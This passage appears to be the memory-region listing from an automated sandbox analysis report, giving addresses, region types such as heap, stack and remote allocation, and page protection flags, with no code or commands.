page read and write
|
||
|
281D9E24000
|
heap
|
page read and write
|
||
|
258B0EF0000
|
remote allocation
|
page read and write
|
||
|
23F53223000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
2AD6F240000
|
heap
|
page readonly
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
2AD6D320000
|
heap
|
page read and write
|
||
|
258B0EF0000
|
remote allocation
|
page read and write
|
||
|
27A68433000
|
heap
|
page read and write
|
||
|
27A015E9000
|
trusted library allocation
|
page read and write
|
||
|
27A663B0000
|
heap
|
page read and write
|
||
|
97D28FE000
|
stack
|
page read and write
|
||
|
1216A2F8000
|
heap
|
page read and write
|
||
|
23F4113A000
|
heap
|
page read and write
|
||
|
1FFDE3B0000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23F41240000
|
heap
|
page execute and read and write
|
||
|
27A66170000
|
heap
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
217B91FA000
|
heap
|
page read and write
|
||
|
23F41179000
|
heap
|
page read and write
|
||
|
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
|
27A67E50000
|
heap
|
page execute and read and write
|
||
|
23F44644000
|
trusted library allocation
|
page read and write
|
||
|
1216A287000
|
heap
|
page read and write
|
||
|
23F41065000
|
heap
|
page read and write
|
||
|
281D9DDF000
|
heap
|
page read and write
|
||
|
2AD015FD000
|
trusted library allocation
|
page read and write
|
||
|
2AD6D40D000
|
heap
|
page read and write
|
||
|
89337BB000
|
stack
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
217B91E0000
|
heap
|
page read and write
|
||
|
217B91DA000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
217B93B0000
|
heap
|
page read and write
|
||
|
281D9E14000
|
heap
|
page read and write
|
||
|
27A019B8000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
23F44A2E000
|
trusted library allocation
|
page read and write
|
||
|
2AD6F610000
|
heap
|
page execute and read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
23F41060000
|
heap
|
page read and write
|
||
|
23F5B2CB000
|
heap
|
page read and write
|
||
|
1E115350000
|
heap
|
page read and write
|
||
|
2AD0022C000
|
trusted library allocation
|
page read and write
|
||
|
F7771F8000
|
stack
|
page read and write
|
||
|
7FF84913D000
|
trusted library allocation
|
page read and write
|
||
|
217BAC90000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
1E115258000
|
heap
|
page read and write
|
||
|
1216A2C3000
|
heap
|
page read and write
|
||
|
F7C49FE000
|
stack
|
page read and write
|
||
|
27A68580000
|
heap
|
page execute and read and write
|
||
|
1216A2F8000
|
heap
|
page read and write
|
||
|
4788B8D000
|
stack
|
page read and write
|
||
|
1216A2D3000
|
heap
|
page read and write
|
||
|
217BACE4000
|
heap
|
page read and write
|
||
|
258B0FBA000
|
heap
|
page read and write
|
||
|
258B0EC0000
|
heap
|
page read and write
|
||
|
27A67D40000
|
trusted library allocation
|
page read and write
|
||
|
F7C3FD9000
|
stack
|
page read and write
|
||
|
2AD01843000
|
trusted library allocation
|
page read and write
|
||
|
23F41290000
|
heap
|
page read and write
|
||
|
27A6631B000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
1216A2AC000
|
heap
|
page read and write
|
||
|
281D9DFF000
|
heap
|
page read and write
|
||
|
2AD6D3E5000
|
heap
|
page read and write
|
||
|
2AD6F230000
|
trusted library allocation
|
page read and write
|
||
|
23F42EF0000
|
heap
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
23F430F2000
|
trusted library allocation
|
page read and write
|
||
|
281D9E26000
|
heap
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
281D9DBC000
|
heap
|
page read and write
|
||
|
2AD101AB000
|
trusted library allocation
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
|
217B9209000
|
heap
|
page read and write
|
||
|
27A67DE0000
|
trusted library allocation
|
page read and write
|
||
|
2AD6D580000
|
heap
|
page read and write
|
||
|
23F5B2BD000
|
heap
|
page read and write
|
||
|
258B0F9D000
|
heap
|
page read and write
|
||
|
27A67E70000
|
heap
|
page read and write
|
||
|
2AD6F7CB000
|
heap
|
page read and write
|
||
|
1216A2BC000
|
heap
|
page read and write
|
||
|
893317E000
|
stack
|
page read and write
|
||
|
23F5B190000
|
heap
|
page read and write
|
||
|
23F5B0B0000
|
heap
|
page read and write
|
||
|
2AD6F620000
|
heap
|
page read and write
|
||
|
1216BCE0000
|
heap
|
page read and write
|
||
|
7FF848FBA000
|
trusted library allocation
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
27A6633A000
|
heap
|
page read and write
|
||
|
2AD6F920000
|
heap
|
page execute and read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
1216A2E0000
|
heap
|
page read and write
|
||
|
2AD6F743000
|
heap
|
page read and write
|
||
|
A7CC9EB000
|
stack
|
page read and write
|
||
|
4787BF9000
|
stack
|
page read and write
|
||
|
1216A2D3000
|
heap
|
page read and write
|
||
|
893444E000
|
stack
|
page read and write
|
||
|
27A67DA0000
|
heap
|
page read and write
|
||
|
23F5B2DD000
|
heap
|
page read and write
|
||
|
23F44C86000
|
trusted library allocation
|
page read and write
|
||
|
281D9CA0000
|
heap
|
page read and write
|
||
|
23F42BA0000
|
heap
|
page read and write
|
||
|
D2794F000
|
unkown
|
page read and write
|
||
|
1216A2EA000
|
heap
|
page read and write
|
||
|
1E1153E0000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
89335BE000
|
stack
|
page read and write
|
||
|
258B0FC9000
|
heap
|
page read and write
|
||
|
1FFDE340000
|
heap
|
page read and write
|
||
|
281D9E24000
|
heap
|
page read and write
|
||
|
47877FD000
|
stack
|
page read and write
|
||
|
217B91CC000
|
heap
|
page read and write
|
||
|
27A015FD000
|
trusted library allocation
|
page read and write
|
||
|
258B0FC9000
|
heap
|
page read and write
|
||
|
2AD6F7C7000
|
heap
|
page read and write
|
||
|
258B0F00000
|
heap
|
page read and write
|
||
|
97D2AFE000
|
stack
|
page read and write
|
||
|
2AD6F492000
|
heap
|
page read and write
|
||
|
7FF848FB1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
|
478894D000
|
stack
|
page read and write
|
||
|
258B0F9D000
|
heap
|
page read and write
|
||
|
27A10070000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA2000
|
trusted library allocation
|
page read and write
|
||
|
2AD6F481000
|
heap
|
page read and write
|
||
|
2AD6D655000
|
heap
|
page read and write
|
||
|
B58D3EC000
|
stack
|
page read and write
|
||
|
281D9DE0000
|
heap
|
page read and write
|
||
|
1216A28A000
|
heap
|
page read and write
|
||
|
281D9DD0000
|
heap
|
page read and write
|
||
|
23F5B0FF000
|
heap
|
page read and write
|
||
|
2AD6F290000
|
trusted library allocation
|
page read and write
|
||
|
1216A295000
|
heap
|
page read and write
|
||
|
97D22F8000
|
stack
|
page read and write
|
||
|
23F5B2CD000
|
heap
|
page read and write
|
||
|
4787CFE000
|
stack
|
page read and write
|
||
|
1E1153E5000
|
heap
|
page read and write
|
||
|
1842B79000
|
stack
|
page read and write
|
||
|
F7772FE000
|
stack
|
page read and write
|
||
|
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
|
1216A2DB000
|
heap
|
page read and write
|
||
|
1216A2DB000
|
heap
|
page read and write
|
||
|
4788A0E000
|
stack
|
page read and write
|
||
|
2AD6D4F0000
|
heap
|
page read and write
|
||
|
7DF4C99B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
23F41000000
|
heap
|
page read and write
|
||
|
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
|
27A686A8000
|
heap
|
page read and write
|
||
|
281D9E3E000
|
heap
|
page read and write
|
||
|
23F5B323000
|
heap
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
23F4115F000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
97D26FE000
|
stack
|
page read and write
|
||
|
7FF848FA5000
|
trusted library allocation
|
page read and write
|
||
|
2AD015CD000
|
trusted library allocation
|
page read and write
|
||
|
1216A2D3000
|
heap
|
page read and write
|
||
|
23F42A73000
|
trusted library allocation
|
page read and write
|
||
|
89334B7000
|
stack
|
page read and write
|
||
|
F7773FF000
|
stack
|
page read and write
|
||
|
F776E7E000
|
stack
|
page read and write
|
||
|
2AD0186F000
|
trusted library allocation
|
page read and write
|
||
|
27A6871F000
|
heap
|
page read and write
|
||
|
27A015EB000
|
trusted library allocation
|
page read and write
|
||
|
1216A440000
|
heap
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
97D24FE000
|
stack
|
page read and write
|
||
|
1216A2DF000
|
heap
|
page read and write
|
||
|
217B919C000
|
heap
|
page read and write
|
||
|
1216A309000
|
heap
|
page read and write
|
||
|
258B0F9B000
|
heap
|
page read and write
|
||
|
1216A295000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA9000
|
trusted library allocation
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
27A68590000
|
heap
|
page read and write
|
||
|
258B0FC8000
|
heap
|
page read and write
|
||
|
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
2AD01C12000
|
trusted library allocation
|
page read and write
|
||
|
2AD6F7AA000
|
heap
|
page read and write
|
||
|
23F5B33E000
|
heap
|
page read and write
|
||
|
18433FF000
|
stack
|
page read and write
|
||
|
27A68727000
|
heap
|
page read and write
|
||
|
2AD018C9000
|
trusted library allocation
|
page read and write
|
||
|
1FFDE360000
|
heap
|
page read and write
|
||
|
23F410B0000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
258B0F9E000
|
heap
|
page read and write
|
||
|
217B920B000
|
heap
|
page read and write
|
||
|
23F448E3000
|
trusted library allocation
|
page read and write
|
||
|
F7C46FE000
|
stack
|
page read and write
|
||
|
27A67E8F000
|
heap
|
page read and write
|
||
|
23F5B163000
|
heap
|
page read and write
|
||
|
F77820E000
|
stack
|
page read and write
|
||
|
1216A2F8000
|
heap
|
page read and write
|
||
|
1216A2E4000
|
heap
|
page read and write
|
||
|
281D9DA9000
|
heap
|
page read and write
|
||
|
47873DE000
|
stack
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
281D9DCB000
|
heap
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
89330FF000
|
stack
|
page read and write
|
||
|
1DDF5E40000
|
heap
|
page read and write
|
||
|
2AD6D300000
|
heap
|
page read and write
|
||
|
4787C77000
|
stack
|
page read and write
|
||
|
F777F4E000
|
stack
|
page read and write
|
||
|
1216A29D000
|
heap
|
page read and write
|
||
|
217B91DF000
|
heap
|
page read and write
|
||
|
281D9E14000
|
heap
|
page read and write
|
||
|
2AD01608000
|
trusted library allocation
|
page read and write
|
||
|
23F44670000
|
trusted library allocation
|
page read and write
|
||
|
89332FF000
|
stack
|
page read and write
|
||
|
893428D000
|
stack
|
page read and write
|
||
|
27A662D3000
|
heap
|
page read and write
|
||
|
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
|
217B91B6000
|
heap
|
page read and write
|
||
|
1216A2DB000
|
heap
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
27A67D60000
|
trusted library allocation
|
page read and write
|
||
|
23F5B070000
|
heap
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
4787D7E000
|
stack
|
page read and write
|
||
|
7FF848FB1000
|
trusted library allocation
|
page read and write
|
||
|
2AD6D328000
|
heap
|
page read and write
|
||
|
281D9E01000
|
heap
|
page read and write
|
||
|
23F530E1000
|
trusted library allocation
|
page read and write
|
||
|
1216A2F8000
|
heap
|
page read and write
|
||
|
27A01638000
|
trusted library allocation
|
page read and write
|
||
|
1216A2DB000
|
heap
|
page read and write
|
||
|
2AD6D3D3000
|
heap
|
page read and write
|
||
|
7FF848FE2000
|
trusted library allocation
|
page read and write
|
||
|
1216A2DB000
|
heap
|
page read and write
|
||
|
2AD6F46D000
|
heap
|
page read and write
|
||
|
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
|
B58D7FE000
|
stack
|
page read and write
|
||
|
27A686B6000
|
heap
|
page read and write
|
||
|
27A6869C000
|
heap
|
page read and write
|
||
|
217B91CD000
|
heap
|
page read and write
|
||
|
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
|
1216A2C2000
|
heap
|
page read and write
|
||
|
7FF848EBC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AD10001000
|
trusted library allocation
|
page read and write
|
||
|
281D9DD0000
|
heap
|
page read and write
|
||
|
2AD6F2D9000
|
heap
|
page read and write
|
||
|
4787E7B000
|
stack
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
23F40FE0000
|
heap
|
page read and write
|
||
|
281DB7E0000
|
heap
|
page read and write
|
||
|
1216A2F8000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
27A01640000
|
trusted library allocation
|
page read and write
|
||
|
23F53080000
|
trusted library allocation
|
page read and write
|
||
|
F7770FE000
|
stack
|
page read and write
|
||
|
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EBC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
2AD6F4CD000
|
heap
|
page read and write
|
||
|
27A67E40000
|
heap
|
page execute and read and write
|
||
|
2AD6F74D000
|
heap
|
page read and write
|
||
|
217B91F2000
|
heap
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
F776F7E000
|
stack
|
page read and write
|
||
|
27A6637A000
|
heap
|
page read and write
|
||
|
23F41230000
|
heap
|
page readonly
|
||
|
23F42B87000
|
heap
|
page execute and read and write
|
||
|
2AD00077000
|
trusted library allocation
|
page read and write
|
||
|
23F5B101000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
1DDF5D48000
|
heap
|
page read and write
|
||
|
478787E000
|
stack
|
page read and write
|
||
|
258B0F9D000
|
heap
|
page read and write
|
||
|
18431FF000
|
stack
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
2AD015EC000
|
trusted library allocation
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
281D9DD7000
|
heap
|
page read and write
|
||
|
27A68060000
|
heap
|
page read and write
|
||
|
F77804D000
|
stack
|
page read and write
|
||
|
23F44BC0000
|
trusted library allocation
|
page read and write
|
||
|
258B0ED0000
|
heap
|
page read and write
|
||
|
27A00075000
|
trusted library allocation
|
page read and write
|
||
|
F776FFD000
|
stack
|
page read and write
|
||
|
1E115250000
|
heap
|
page read and write
|
||
|
893373B000
|
stack
|
page read and write
|
||
|
217BB038000
|
heap
|
page read and write
|
||
|
2AD015E3000
|
trusted library allocation
|
page read and write
|
||
|
23F44C8A000
|
trusted library allocation
|
page read and write
|
||
|
2AD6D3C5000
|
heap
|
page read and write
|
||
|
97D27FE000
|
stack
|
page read and write
|
||
|
1216A2C3000
|
heap
|
page read and write
|
||
|
27A66250000
|
heap
|
page read and write
|
||
|
97D2BFF000
|
stack
|
page read and write
|
||
|
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
217B91FA000
|
heap
|
page read and write
|
||
|
1216A27C000
|
heap
|
page read and write
|
||
|
23F43060000
|
heap
|
page read and write
|
||
|
281D9DEF000
|
heap
|
page read and write
|
||
|
23F448B8000
|
trusted library allocation
|
page read and write
|
||
|
F776BBE000
|
stack
|
page read and write
|
||
|
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
|
281D9E25000
|
heap
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
2AD6F4CF000
|
heap
|
page read and write
|
||
|
2AD10074000
|
trusted library allocation
|
page read and write
|
||
|
2AD6F720000
|
heap
|
page read and write
|
||
|
27A66313000
|
heap
|
page read and write
|
||
|
27A6848A000
|
heap
|
page read and write
|
||
|
217B91F2000
|
heap
|
page read and write
|
||
|
217B91FA000
|
heap
|
page read and write
|
||
|
2AD6D5F0000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
27A015FB000
|
trusted library allocation
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
4787DFE000
|
stack
|
page read and write
|
||
|
23F43071000
|
trusted library allocation
|
page read and write
|
||
|
23F42A70000
|
trusted library allocation
|
page read and write
|
||
|
217B91F2000
|
heap
|
page read and write
|
||
|
217BCAD0000
|
trusted library allocation
|
page read and write
|
||
|
478898F000
|
stack
|
page read and write
|
||
|
217B9180000
|
heap
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
2AD6F486000
|
heap
|
page read and write
|
||
|
281D9DFD000
|
heap
|
page read and write
|
||
|
F77810F000
|
stack
|
page read and write
|
||
|
1216A309000
|
heap
|
page read and write
|
||
|
217B9203000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
2AD6F200000
|
trusted library allocation
|
page read and write
|
||
|
1216A2F8000
|
heap
|
page read and write
|
||
|
1216A281000
|
heap
|
page read and write
|
||
|
1216A2D3000
|
heap
|
page read and write
|
||
|
2AD015FF000
|
trusted library allocation
|
page read and write
|
||
|
23F53071000
|
trusted library allocation
|
page read and write
|
||
|
23F42B80000
|
heap
|
page execute and read and write
|
||
|
2AD6F250000
|
heap
|
page read and write
|
||
|
7FF848E04000
|
trusted library allocation
|
page read and write
|
||
|
2AD6F513000
|
heap
|
page read and write
|
||
|
27A683B0000
|
heap
|
page read and write
|
||
|
F777FCE000
|
stack
|
page read and write
|
||
|
A7CCC7F000
|
unkown
|
page read and write
|
There are 690 hidden memdumps, click here to show them.